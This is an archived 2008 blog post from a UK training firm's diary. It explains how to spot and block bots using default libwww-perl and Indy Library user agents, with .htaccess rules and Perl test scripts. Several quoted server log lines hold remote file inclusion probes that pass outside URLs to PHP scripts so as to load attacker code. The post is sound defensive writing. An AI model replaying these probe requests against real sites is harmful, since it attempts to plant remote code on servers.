libwww-perl and Indy Library in your server logs?

Here are some sample lines from our server logs ... and I don't like the look of them!

from 195.39.5.203 - Moravskoslezsky Kraj, Czech Republic [1000 miles] - libwww-perl/5.805
.net: /resources/recents.html/plugins/safeh...ms_files/images/id.txt???//index ... 16:44:24


from 91.187.115.253 - Vojvodina, Serbia [1295 miles] - Mozilla/3.0 (compatible; Indy Library)
.net: /resources/smap.php?adder=http://www.freewebs.com/atdheu-mc/raw.txt?/exa ... 16:45:17


Records like these - with "Indy Library" or "libwww-perl" in the name of the browser (also known as the "User Agent") - are very likely to be attempts to find a security hole in our site scripts. Through such a hole, the attacker could copy their code onto our server and go on to infect other systems, or use our site to advertise their own by injecting their own URLs. So what are "Indy Library" and "libwww-perl"?

Indy Library usually comes from the Delphi/C++ Builder suite of tools. Someone has written an automated program using the library ...

libwww-perl is the Perl LWP (Library for WWW in Perl) library, so in this case it's probable that someone has written an automated program in Perl ...

Automated programs are a necessity - and indeed we welcome well behaved crawlers, from the well known Google and Yahoo through to more obscure ones too. But authors of such crawlers who properly know what they're doing change the User Agent string rather than using the library default. In my experience, we really don't want visitors with the default User Agent on our site: at least 90% of them are malicious, with the remaining 10% being amateur. So how can we turn them off?

Standard practice is to ask specific user agents to stay away via the robots.txt file - but that file is only a request, and chances are that the naughty bots won't respect it, so we need to enforce the rule!
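
For comparison, a robots.txt request of that kind might look like the sketch below. It only has any effect on clients that choose to fetch and honour robots.txt, which is why it can't be relied on here:

```text
User-agent: libwww-perl
Disallow: /
```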

Here are three lines that I've added to our .htaccess file ...

SetEnvIfNoCase User-Agent "libwww-perl" naughty_boys
SetEnvIfNoCase User-Agent "Indy Library" naughty_boys
Deny from env=naughty_boys


These lines will send out a 403 Forbidden response to the automata, telling them that they can't have the page they seek. Goodness knows what the receiving bot will do with the error - but we can make our 403 'handler' simple, quick, secure, and light on bandwidth.
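
The three .htaccess lines use the Apache 2.2 style of access control. On Apache 2.4, "Deny from" is only available through mod_access_compat, so a roughly equivalent sketch in the newer "Require" syntax might look like this. It also sets a plain-text 403 body to keep the error response small. The message wording is just an illustration, and the sketch assumes that .htaccess overrides for these directives are allowed on the server:

```apache
SetEnvIfNoCase User-Agent "libwww-perl" naughty_boys
SetEnvIfNoCase User-Agent "Indy Library" naughty_boys

# Apache 2.4 access control: allow everyone except flagged requests
<RequireAll>
    Require all granted
    Require not env naughty_boys
</RequireAll>

# Short plain-text body for the 403 response (wording is illustrative)
ErrorDocument 403 "Forbidden"
```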

How do we test that?

Here's a simple Perl script that will declare itself as being libwww:

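#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;

# A default LWP::UserAgent announces itself as "libwww-perl/<version>"
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => 'http://www.wellho.net/index.html');
my $res = $ua->request($req);

# Print the page on success, or the HTTP status line on failure
if ($res->is_success) {
  print $res->content;
} else {
  print "Error: " . $res->status_line . "\n";
}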


And when I run that, it now gives me:

-bash-3.2$ perl pg1
Error: 403 Forbidden
-bash-3.2$


If I add the line:

$ua->agent("Well House Consultants Bot");

into that program, I get a much more satisfying result back ...

-bash-3.2$ perl pg2
 
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<meta name="author" content="Lisa Ellis" />
And so on


Links - full source code of our test program without and with our own user agent being set.


One of the matters that I considered very carefully indeed before blocking these user agents was the possibility that I'm blocking some useful and important traffic as well as a lot of "nasties" - throwing out the baby with the bathwater, if you like. Not the case, I believe - most people who have legit babies take good care of them and name them properly - but I will be watching my log files nonetheless to check.
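
One way to keep that watch is to tally which user agents are receiving 403 responses. What follows is a minimal sketch, not the script actually used on this site: it assumes the log is in Apache's "combined" format (status, bytes, referer and user agent at the end of each line), and the sub name and file names are hypothetical.

```perl
#!/usr/bin/perl
# Tally 403 responses by user agent from Apache "combined" format log lines.
use strict;
use warnings;

# Takes a list of log lines; returns a hash ref of user agent => count of 403s.
sub count_blocked_agents {
    my @lines = @_;
    my %blocked;
    for my $line (@lines) {
        # Tail of a combined-format line: "request" status bytes "referer" "agent"
        next unless $line =~ /" (\d{3}) \S+ "[^"]*" "([^"]*)"\s*$/;
        my ($status, $agent) = ($1, $2);
        $blocked{$agent}++ if $status == 403;
    }
    return \%blocked;
}

# Run as: perl blocked_agents.pl access_log   (file names are hypothetical)
if (@ARGV) {
    my $blocked = count_blocked_agents(<>);
    # Most frequently blocked agents first, ties in alphabetical order
    for my $agent (sort { $blocked->{$b} <=> $blocked->{$a} || $a cmp $b }
                   keys %$blocked) {
        printf "%6d  %s\n", $blocked->{$agent}, $agent;
    }
}
```

Any properly named agent that turns up in this list would be a sign that the rule is catching more than was intended.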

As I finished writing this article - some poetic justice from my log file ...

64.159.77.76 - - [12/Sep/2008:21:28:20 +0100] "GET /mouth/1542_Are-nasty-programs-looking-for-security-holes-on-your-server-.html/errors.php?error=http://vnc2008.webcindario.com/idr0x.txt??? HTTP/1.1" 403 - "-" "libwww-perl/5.805"

Some automaton is looking to hack into a previous short article on security holes, and is being firmly denied access.

(written 2008-09-13)

 




This is a page archived from The Horse's Mouth at http://www.wellho.net/horse/ - the diary and writings of Graham Ellis. Every attempt was made to provide current information at the time the page was written, but things do move forward in our business - new software releases, price changes, new techniques. Please check back via our main site for current courses, prices, versions, etc - any mention of a price in "The Horse's Mouth" cannot be taken as an offer to supply at that price.


© WELL HOUSE CONSULTANTS LTD., 2021: 48 Spa Road • Melksham, Wiltshire • United Kingdom • SN12 7NY
PH: 01144 1225 708225 • EMAIL: info@wellho.net • WEB: http://www.wellho.net • SKYPE: wellho

PAGE: http://www.wellho.net/mouth/1796_lib ... logs-.html • PAGE BUILT: Sun Oct 11 16:07:41 2020 • BUILD SYSTEM: JelliaJamb